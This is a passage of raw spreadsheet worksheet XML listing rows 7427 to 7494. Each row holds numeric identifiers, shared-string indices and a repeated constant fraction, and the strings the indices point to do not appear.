        <v>5.4601717E7</v>
      </c>
      <c r="C7427" s="2" t="s">
        <v>7049</v>
      </c>
      <c r="D7427" s="2">
        <v>1.0</v>
      </c>
      <c r="E7427" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7427" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7428" ht="15.75" customHeight="1">
      <c r="A7428" s="1">
        <v>9734.0</v>
      </c>
      <c r="B7428" s="2">
        <v>5.6447103E7</v>
      </c>
      <c r="C7428" s="2" t="s">
        <v>7050</v>
      </c>
      <c r="D7428" s="2">
        <v>1.0</v>
      </c>
      <c r="E7428" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7428" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7429" ht="15.75" customHeight="1">
      <c r="A7429" s="1">
        <v>10949.0</v>
      </c>
      <c r="B7429" s="2">
        <v>171075.0</v>
      </c>
      <c r="C7429" s="2" t="s">
        <v>7051</v>
      </c>
      <c r="D7429" s="2">
        <v>1.0</v>
      </c>
      <c r="E7429" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7429" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7430" ht="15.75" customHeight="1">
      <c r="A7430" s="1">
        <v>11907.0</v>
      </c>
      <c r="B7430" s="2">
        <v>2.5208596E7</v>
      </c>
      <c r="C7430" s="2" t="s">
        <v>7052</v>
      </c>
      <c r="D7430" s="2">
        <v>1.0</v>
      </c>
      <c r="E7430" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7430" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7431" ht="15.75" customHeight="1">
      <c r="A7431" s="1">
        <v>12024.0</v>
      </c>
      <c r="B7431" s="2">
        <v>2.6087477E7</v>
      </c>
      <c r="C7431" s="2" t="s">
        <v>7053</v>
      </c>
      <c r="D7431" s="2">
        <v>1.0</v>
      </c>
      <c r="E7431" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7431" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7432" ht="15.75" customHeight="1">
      <c r="A7432" s="1">
        <v>12573.0</v>
      </c>
      <c r="B7432" s="2">
        <v>2.9996443E7</v>
      </c>
      <c r="C7432" s="2" t="s">
        <v>7054</v>
      </c>
      <c r="D7432" s="2">
        <v>1.0</v>
      </c>
      <c r="E7432" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7432" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7433" ht="15.75" customHeight="1">
      <c r="A7433" s="1">
        <v>13124.0</v>
      </c>
      <c r="B7433" s="2">
        <v>3.3630128E7</v>
      </c>
      <c r="C7433" s="2" t="s">
        <v>7055</v>
      </c>
      <c r="D7433" s="2">
        <v>1.0</v>
      </c>
      <c r="E7433" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7433" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7434" ht="15.75" customHeight="1">
      <c r="A7434" s="1">
        <v>13195.0</v>
      </c>
      <c r="B7434" s="2">
        <v>3.4099262E7</v>
      </c>
      <c r="C7434" s="2" t="s">
        <v>7056</v>
      </c>
      <c r="D7434" s="2">
        <v>1.0</v>
      </c>
      <c r="E7434" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7434" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7435" ht="15.75" customHeight="1">
      <c r="A7435" s="1">
        <v>13255.0</v>
      </c>
      <c r="B7435" s="2">
        <v>3.4291658E7</v>
      </c>
      <c r="C7435" s="2" t="s">
        <v>7057</v>
      </c>
      <c r="D7435" s="2">
        <v>1.0</v>
      </c>
      <c r="E7435" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7435" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7436" ht="15.75" customHeight="1">
      <c r="A7436" s="1">
        <v>13497.0</v>
      </c>
      <c r="B7436" s="2">
        <v>3.541985E7</v>
      </c>
      <c r="C7436" s="2" t="s">
        <v>7058</v>
      </c>
      <c r="D7436" s="2">
        <v>1.0</v>
      </c>
      <c r="E7436" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7436" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7437" ht="15.75" customHeight="1">
      <c r="A7437" s="1">
        <v>13511.0</v>
      </c>
      <c r="B7437" s="2">
        <v>3.5461856E7</v>
      </c>
      <c r="C7437" s="2" t="s">
        <v>7059</v>
      </c>
      <c r="D7437" s="2">
        <v>1.0</v>
      </c>
      <c r="E7437" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7437" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7438" ht="15.75" customHeight="1">
      <c r="A7438" s="1">
        <v>14094.0</v>
      </c>
      <c r="B7438" s="2">
        <v>3.7740433E7</v>
      </c>
      <c r="C7438" s="2" t="s">
        <v>7060</v>
      </c>
      <c r="D7438" s="2">
        <v>1.0</v>
      </c>
      <c r="E7438" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7438" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7439" ht="15.75" customHeight="1">
      <c r="A7439" s="1">
        <v>14098.0</v>
      </c>
      <c r="B7439" s="2">
        <v>3.7746637E7</v>
      </c>
      <c r="C7439" s="2" t="s">
        <v>7060</v>
      </c>
      <c r="D7439" s="2">
        <v>1.0</v>
      </c>
      <c r="E7439" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7439" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7440" ht="15.75" customHeight="1">
      <c r="A7440" s="1">
        <v>15359.0</v>
      </c>
      <c r="B7440" s="2">
        <v>4.2695701E7</v>
      </c>
      <c r="C7440" s="2" t="s">
        <v>7061</v>
      </c>
      <c r="D7440" s="2">
        <v>1.0</v>
      </c>
      <c r="E7440" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7440" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7441" ht="15.75" customHeight="1">
      <c r="A7441" s="1">
        <v>16057.0</v>
      </c>
      <c r="B7441" s="2">
        <v>4.5268957E7</v>
      </c>
      <c r="C7441" s="2" t="s">
        <v>7062</v>
      </c>
      <c r="D7441" s="2">
        <v>1.0</v>
      </c>
      <c r="E7441" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7441" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7442" ht="15.75" customHeight="1">
      <c r="A7442" s="1">
        <v>16431.0</v>
      </c>
      <c r="B7442" s="2">
        <v>4.6335716E7</v>
      </c>
      <c r="C7442" s="2" t="s">
        <v>7063</v>
      </c>
      <c r="D7442" s="2">
        <v>1.0</v>
      </c>
      <c r="E7442" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7442" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7443" ht="15.75" customHeight="1">
      <c r="A7443" s="1">
        <v>16943.0</v>
      </c>
      <c r="B7443" s="2">
        <v>4.8213644E7</v>
      </c>
      <c r="C7443" s="2" t="s">
        <v>7064</v>
      </c>
      <c r="D7443" s="2">
        <v>1.0</v>
      </c>
      <c r="E7443" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7443" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7444" ht="15.75" customHeight="1">
      <c r="A7444" s="1">
        <v>17036.0</v>
      </c>
      <c r="B7444" s="2">
        <v>4.8505919E7</v>
      </c>
      <c r="C7444" s="2" t="s">
        <v>7065</v>
      </c>
      <c r="D7444" s="2">
        <v>1.0</v>
      </c>
      <c r="E7444" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7444" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7445" ht="15.75" customHeight="1">
      <c r="A7445" s="1">
        <v>17129.0</v>
      </c>
      <c r="B7445" s="2">
        <v>4.8816589E7</v>
      </c>
      <c r="C7445" s="2" t="s">
        <v>7066</v>
      </c>
      <c r="D7445" s="2">
        <v>1.0</v>
      </c>
      <c r="E7445" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7445" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7446" ht="15.75" customHeight="1">
      <c r="A7446" s="1">
        <v>17186.0</v>
      </c>
      <c r="B7446" s="2">
        <v>4.8914679E7</v>
      </c>
      <c r="C7446" s="2" t="s">
        <v>7067</v>
      </c>
      <c r="D7446" s="2">
        <v>1.0</v>
      </c>
      <c r="E7446" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7446" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7447" ht="15.75" customHeight="1">
      <c r="A7447" s="1">
        <v>17193.0</v>
      </c>
      <c r="B7447" s="2">
        <v>4.8930154E7</v>
      </c>
      <c r="C7447" s="2" t="s">
        <v>7068</v>
      </c>
      <c r="D7447" s="2">
        <v>1.0</v>
      </c>
      <c r="E7447" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7447" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7448" ht="15.75" customHeight="1">
      <c r="A7448" s="1">
        <v>17224.0</v>
      </c>
      <c r="B7448" s="2">
        <v>4.9066306E7</v>
      </c>
      <c r="C7448" s="2" t="s">
        <v>7069</v>
      </c>
      <c r="D7448" s="2">
        <v>1.0</v>
      </c>
      <c r="E7448" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7448" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7449" ht="15.75" customHeight="1">
      <c r="A7449" s="1">
        <v>17493.0</v>
      </c>
      <c r="B7449" s="2">
        <v>4.9984569E7</v>
      </c>
      <c r="C7449" s="2" t="s">
        <v>7070</v>
      </c>
      <c r="D7449" s="2">
        <v>1.0</v>
      </c>
      <c r="E7449" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7449" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7450" ht="15.75" customHeight="1">
      <c r="A7450" s="1">
        <v>17631.0</v>
      </c>
      <c r="B7450" s="2">
        <v>5.0389556E7</v>
      </c>
      <c r="C7450" s="2" t="s">
        <v>7071</v>
      </c>
      <c r="D7450" s="2">
        <v>1.0</v>
      </c>
      <c r="E7450" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7450" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7451" ht="15.75" customHeight="1">
      <c r="A7451" s="1">
        <v>17869.0</v>
      </c>
      <c r="B7451" s="2">
        <v>5.1021774E7</v>
      </c>
      <c r="C7451" s="2" t="s">
        <v>7072</v>
      </c>
      <c r="D7451" s="2">
        <v>1.0</v>
      </c>
      <c r="E7451" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7451" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7452" ht="15.75" customHeight="1">
      <c r="A7452" s="1">
        <v>18027.0</v>
      </c>
      <c r="B7452" s="2">
        <v>5.1530177E7</v>
      </c>
      <c r="C7452" s="2" t="s">
        <v>7073</v>
      </c>
      <c r="D7452" s="2">
        <v>1.0</v>
      </c>
      <c r="E7452" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7452" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7453" ht="15.75" customHeight="1">
      <c r="A7453" s="1">
        <v>18438.0</v>
      </c>
      <c r="B7453" s="2">
        <v>5.2764847E7</v>
      </c>
      <c r="C7453" s="2" t="s">
        <v>7074</v>
      </c>
      <c r="D7453" s="2">
        <v>1.0</v>
      </c>
      <c r="E7453" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7453" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7454" ht="15.75" customHeight="1">
      <c r="A7454" s="1">
        <v>18446.0</v>
      </c>
      <c r="B7454" s="2">
        <v>5.2777446E7</v>
      </c>
      <c r="C7454" s="2" t="s">
        <v>7075</v>
      </c>
      <c r="D7454" s="2">
        <v>1.0</v>
      </c>
      <c r="E7454" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7454" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7455" ht="15.75" customHeight="1">
      <c r="A7455" s="1">
        <v>18493.0</v>
      </c>
      <c r="B7455" s="2">
        <v>5.2913854E7</v>
      </c>
      <c r="C7455" s="2" t="s">
        <v>7076</v>
      </c>
      <c r="D7455" s="2">
        <v>1.0</v>
      </c>
      <c r="E7455" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7455" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7456" ht="15.75" customHeight="1">
      <c r="A7456" s="1">
        <v>18856.0</v>
      </c>
      <c r="B7456" s="2">
        <v>5.3984511E7</v>
      </c>
      <c r="C7456" s="2" t="s">
        <v>7077</v>
      </c>
      <c r="D7456" s="2">
        <v>1.0</v>
      </c>
      <c r="E7456" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7456" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7457" ht="15.75" customHeight="1">
      <c r="A7457" s="1">
        <v>19411.0</v>
      </c>
      <c r="B7457" s="2">
        <v>5.5596595E7</v>
      </c>
      <c r="C7457" s="2" t="s">
        <v>7078</v>
      </c>
      <c r="D7457" s="2">
        <v>1.0</v>
      </c>
      <c r="E7457" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7457" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7458" ht="15.75" customHeight="1">
      <c r="A7458" s="1">
        <v>19743.0</v>
      </c>
      <c r="B7458" s="2">
        <v>5.6691282E7</v>
      </c>
      <c r="C7458" s="2" t="s">
        <v>7079</v>
      </c>
      <c r="D7458" s="2">
        <v>1.0</v>
      </c>
      <c r="E7458" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7458" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7459" ht="15.75" customHeight="1">
      <c r="A7459" s="1">
        <v>20782.0</v>
      </c>
      <c r="B7459" s="2">
        <v>1.5035156E7</v>
      </c>
      <c r="C7459" s="2" t="s">
        <v>7080</v>
      </c>
      <c r="D7459" s="2">
        <v>1.0</v>
      </c>
      <c r="E7459" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7459" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7460" ht="15.75" customHeight="1">
      <c r="A7460" s="1">
        <v>20895.0</v>
      </c>
      <c r="B7460" s="2">
        <v>1.6230637E7</v>
      </c>
      <c r="C7460" s="2" t="s">
        <v>7081</v>
      </c>
      <c r="D7460" s="2">
        <v>1.0</v>
      </c>
      <c r="E7460" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7460" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7461" ht="15.75" customHeight="1">
      <c r="A7461" s="1">
        <v>21008.0</v>
      </c>
      <c r="B7461" s="2">
        <v>1.7243563E7</v>
      </c>
      <c r="C7461" s="2" t="s">
        <v>7082</v>
      </c>
      <c r="D7461" s="2">
        <v>1.0</v>
      </c>
      <c r="E7461" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7461" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7462" ht="15.75" customHeight="1">
      <c r="A7462" s="1">
        <v>21303.0</v>
      </c>
      <c r="B7462" s="2">
        <v>2.0716881E7</v>
      </c>
      <c r="C7462" s="2" t="s">
        <v>7083</v>
      </c>
      <c r="D7462" s="2">
        <v>1.0</v>
      </c>
      <c r="E7462" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7462" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7463" ht="15.75" customHeight="1">
      <c r="A7463" s="1">
        <v>21316.0</v>
      </c>
      <c r="B7463" s="2">
        <v>2.0865715E7</v>
      </c>
      <c r="C7463" s="2" t="s">
        <v>7084</v>
      </c>
      <c r="D7463" s="2">
        <v>1.0</v>
      </c>
      <c r="E7463" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7463" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7464" ht="15.75" customHeight="1">
      <c r="A7464" s="1">
        <v>21728.0</v>
      </c>
      <c r="B7464" s="2">
        <v>2.5692428E7</v>
      </c>
      <c r="C7464" s="2" t="s">
        <v>7085</v>
      </c>
      <c r="D7464" s="2">
        <v>1.0</v>
      </c>
      <c r="E7464" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7464" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7465" ht="15.75" customHeight="1">
      <c r="A7465" s="1">
        <v>21809.0</v>
      </c>
      <c r="B7465" s="2">
        <v>2.6793479E7</v>
      </c>
      <c r="C7465" s="2" t="s">
        <v>7086</v>
      </c>
      <c r="D7465" s="2">
        <v>1.0</v>
      </c>
      <c r="E7465" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7465" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7466" ht="15.75" customHeight="1">
      <c r="A7466" s="1">
        <v>22255.0</v>
      </c>
      <c r="B7466" s="2">
        <v>3.2811571E7</v>
      </c>
      <c r="C7466" s="2" t="s">
        <v>7087</v>
      </c>
      <c r="D7466" s="2">
        <v>1.0</v>
      </c>
      <c r="E7466" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7466" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7467" ht="15.75" customHeight="1">
      <c r="A7467" s="1">
        <v>22419.0</v>
      </c>
      <c r="B7467" s="2">
        <v>3.6072363E7</v>
      </c>
      <c r="C7467" s="2" t="s">
        <v>7088</v>
      </c>
      <c r="D7467" s="2">
        <v>1.0</v>
      </c>
      <c r="E7467" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7467" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7468" ht="15.75" customHeight="1">
      <c r="A7468" s="1">
        <v>22584.0</v>
      </c>
      <c r="B7468" s="2">
        <v>3.8949509E7</v>
      </c>
      <c r="C7468" s="2" t="s">
        <v>7089</v>
      </c>
      <c r="D7468" s="2">
        <v>1.0</v>
      </c>
      <c r="E7468" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7468" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7469" ht="15.75" customHeight="1">
      <c r="A7469" s="1">
        <v>22880.0</v>
      </c>
      <c r="B7469" s="2">
        <v>4.7661834E7</v>
      </c>
      <c r="C7469" s="2" t="s">
        <v>7090</v>
      </c>
      <c r="D7469" s="2">
        <v>1.0</v>
      </c>
      <c r="E7469" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7469" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7470" ht="15.75" customHeight="1">
      <c r="A7470" s="1">
        <v>22954.0</v>
      </c>
      <c r="B7470" s="2">
        <v>4.9039013E7</v>
      </c>
      <c r="C7470" s="2" t="s">
        <v>7091</v>
      </c>
      <c r="D7470" s="2">
        <v>1.0</v>
      </c>
      <c r="E7470" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7470" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7471" ht="15.75" customHeight="1">
      <c r="A7471" s="1">
        <v>23048.0</v>
      </c>
      <c r="B7471" s="2">
        <v>5019430.0</v>
      </c>
      <c r="C7471" s="2" t="s">
        <v>7092</v>
      </c>
      <c r="D7471" s="2">
        <v>1.0</v>
      </c>
      <c r="E7471" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7471" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7472" ht="15.75" customHeight="1">
      <c r="A7472" s="1">
        <v>23143.0</v>
      </c>
      <c r="B7472" s="2">
        <v>5.1611673E7</v>
      </c>
      <c r="C7472" s="2" t="s">
        <v>7093</v>
      </c>
      <c r="D7472" s="2">
        <v>1.0</v>
      </c>
      <c r="E7472" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7472" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7473" ht="15.75" customHeight="1">
      <c r="A7473" s="1">
        <v>23144.0</v>
      </c>
      <c r="B7473" s="2">
        <v>5170516.0</v>
      </c>
      <c r="C7473" s="2" t="s">
        <v>7094</v>
      </c>
      <c r="D7473" s="2">
        <v>1.0</v>
      </c>
      <c r="E7473" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7473" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7474" ht="15.75" customHeight="1">
      <c r="A7474" s="1">
        <v>23235.0</v>
      </c>
      <c r="B7474" s="2">
        <v>5.2947182E7</v>
      </c>
      <c r="C7474" s="2" t="s">
        <v>7095</v>
      </c>
      <c r="D7474" s="2">
        <v>1.0</v>
      </c>
      <c r="E7474" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7474" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7475" ht="15.75" customHeight="1">
      <c r="A7475" s="1">
        <v>23426.0</v>
      </c>
      <c r="B7475" s="2">
        <v>5.6425745E7</v>
      </c>
      <c r="C7475" s="2" t="s">
        <v>7096</v>
      </c>
      <c r="D7475" s="2">
        <v>1.0</v>
      </c>
      <c r="E7475" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7475" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7476" ht="15.75" customHeight="1">
      <c r="A7476" s="1">
        <v>23561.0</v>
      </c>
      <c r="B7476" s="2">
        <v>6146683.0</v>
      </c>
      <c r="C7476" s="2" t="s">
        <v>7097</v>
      </c>
      <c r="D7476" s="2">
        <v>1.0</v>
      </c>
      <c r="E7476" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7476" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7477" ht="15.75" customHeight="1">
      <c r="A7477" s="1">
        <v>23639.0</v>
      </c>
      <c r="B7477" s="2">
        <v>6669465.0</v>
      </c>
      <c r="C7477" s="2" t="s">
        <v>7098</v>
      </c>
      <c r="D7477" s="2">
        <v>1.0</v>
      </c>
      <c r="E7477" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7477" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7478" ht="15.75" customHeight="1">
      <c r="A7478" s="1">
        <v>23779.0</v>
      </c>
      <c r="B7478" s="2">
        <v>7632038.0</v>
      </c>
      <c r="C7478" s="2" t="s">
        <v>7099</v>
      </c>
      <c r="D7478" s="2">
        <v>1.0</v>
      </c>
      <c r="E7478" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7478" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7479" ht="15.75" customHeight="1">
      <c r="A7479" s="1">
        <v>24055.0</v>
      </c>
      <c r="B7479" s="2">
        <v>9575627.0</v>
      </c>
      <c r="C7479" s="2" t="s">
        <v>7100</v>
      </c>
      <c r="D7479" s="2">
        <v>1.0</v>
      </c>
      <c r="E7479" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7479" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7480" ht="15.75" customHeight="1">
      <c r="A7480" s="1">
        <v>24312.0</v>
      </c>
      <c r="B7480" s="2">
        <v>1.0601516E7</v>
      </c>
      <c r="C7480" s="2" t="s">
        <v>7101</v>
      </c>
      <c r="D7480" s="2">
        <v>1.0</v>
      </c>
      <c r="E7480" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7480" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7481" ht="15.75" customHeight="1">
      <c r="A7481" s="1">
        <v>24539.0</v>
      </c>
      <c r="B7481" s="2">
        <v>1.1214421E7</v>
      </c>
      <c r="C7481" s="2" t="s">
        <v>7102</v>
      </c>
      <c r="D7481" s="2">
        <v>1.0</v>
      </c>
      <c r="E7481" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7481" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7482" ht="15.75" customHeight="1">
      <c r="A7482" s="1">
        <v>24581.0</v>
      </c>
      <c r="B7482" s="2">
        <v>1.1328985E7</v>
      </c>
      <c r="C7482" s="2" t="s">
        <v>7103</v>
      </c>
      <c r="D7482" s="2">
        <v>1.0</v>
      </c>
      <c r="E7482" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7482" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7483" ht="15.75" customHeight="1">
      <c r="A7483" s="1">
        <v>24765.0</v>
      </c>
      <c r="B7483" s="2">
        <v>1.1845111E7</v>
      </c>
      <c r="C7483" s="2" t="s">
        <v>7104</v>
      </c>
      <c r="D7483" s="2">
        <v>1.0</v>
      </c>
      <c r="E7483" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7483" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7484" ht="15.75" customHeight="1">
      <c r="A7484" s="1">
        <v>25048.0</v>
      </c>
      <c r="B7484" s="2">
        <v>1.2845803E7</v>
      </c>
      <c r="C7484" s="2" t="s">
        <v>7105</v>
      </c>
      <c r="D7484" s="2">
        <v>1.0</v>
      </c>
      <c r="E7484" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7484" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7485" ht="15.75" customHeight="1">
      <c r="A7485" s="1">
        <v>25382.0</v>
      </c>
      <c r="B7485" s="2">
        <v>1.3655685E7</v>
      </c>
      <c r="C7485" s="2" t="s">
        <v>7106</v>
      </c>
      <c r="D7485" s="2">
        <v>1.0</v>
      </c>
      <c r="E7485" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7485" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7486" ht="15.75" customHeight="1">
      <c r="A7486" s="1">
        <v>25426.0</v>
      </c>
      <c r="B7486" s="2">
        <v>1.3821075E7</v>
      </c>
      <c r="C7486" s="2" t="s">
        <v>7107</v>
      </c>
      <c r="D7486" s="2">
        <v>1.0</v>
      </c>
      <c r="E7486" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7486" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7487" ht="15.75" customHeight="1">
      <c r="A7487" s="1">
        <v>25511.0</v>
      </c>
      <c r="B7487" s="2">
        <v>1.4158655E7</v>
      </c>
      <c r="C7487" s="2" t="s">
        <v>7108</v>
      </c>
      <c r="D7487" s="2">
        <v>1.0</v>
      </c>
      <c r="E7487" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7487" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7488" ht="15.75" customHeight="1">
      <c r="A7488" s="1">
        <v>25574.0</v>
      </c>
      <c r="B7488" s="2">
        <v>1.4332275E7</v>
      </c>
      <c r="C7488" s="2" t="s">
        <v>7109</v>
      </c>
      <c r="D7488" s="2">
        <v>1.0</v>
      </c>
      <c r="E7488" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7488" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7489" ht="15.75" customHeight="1">
      <c r="A7489" s="1">
        <v>25602.0</v>
      </c>
      <c r="B7489" s="2">
        <v>1.4395235E7</v>
      </c>
      <c r="C7489" s="2" t="s">
        <v>7110</v>
      </c>
      <c r="D7489" s="2">
        <v>1.0</v>
      </c>
      <c r="E7489" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7489" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7490" ht="15.75" customHeight="1">
      <c r="A7490" s="1">
        <v>25789.0</v>
      </c>
      <c r="B7490" s="2">
        <v>1.4674387E7</v>
      </c>
      <c r="C7490" s="2" t="s">
        <v>7111</v>
      </c>
      <c r="D7490" s="2">
        <v>1.0</v>
      </c>
      <c r="E7490" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7490" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7491" ht="15.75" customHeight="1">
      <c r="A7491" s="1">
        <v>26135.0</v>
      </c>
      <c r="B7491" s="2">
        <v>1.6004574E7</v>
      </c>
      <c r="C7491" s="2" t="s">
        <v>7112</v>
      </c>
      <c r="D7491" s="2">
        <v>1.0</v>
      </c>
      <c r="E7491" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7491" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7492" ht="15.75" customHeight="1">
      <c r="A7492" s="1">
        <v>26193.0</v>
      </c>
      <c r="B7492" s="2">
        <v>1.6230636E7</v>
      </c>
      <c r="C7492" s="2" t="s">
        <v>7081</v>
      </c>
      <c r="D7492" s="2">
        <v>1.0</v>
      </c>
      <c r="E7492" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7492" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7493" ht="15.75" customHeight="1">
      <c r="A7493" s="1">
        <v>26303.0</v>
      </c>
      <c r="B7493" s="2">
        <v>1.6573806E7</v>
      </c>
      <c r="C7493" s="2" t="s">
        <v>7113</v>
      </c>
      <c r="D7493" s="2">
        <v>1.0</v>
      </c>
      <c r="E7493" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7493" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="7494" ht="15.75" customHeight="1">
      <c r="A7494" s="1">
        <v>26406.0</v>
      </c>
      <c r="B7494" s="2">
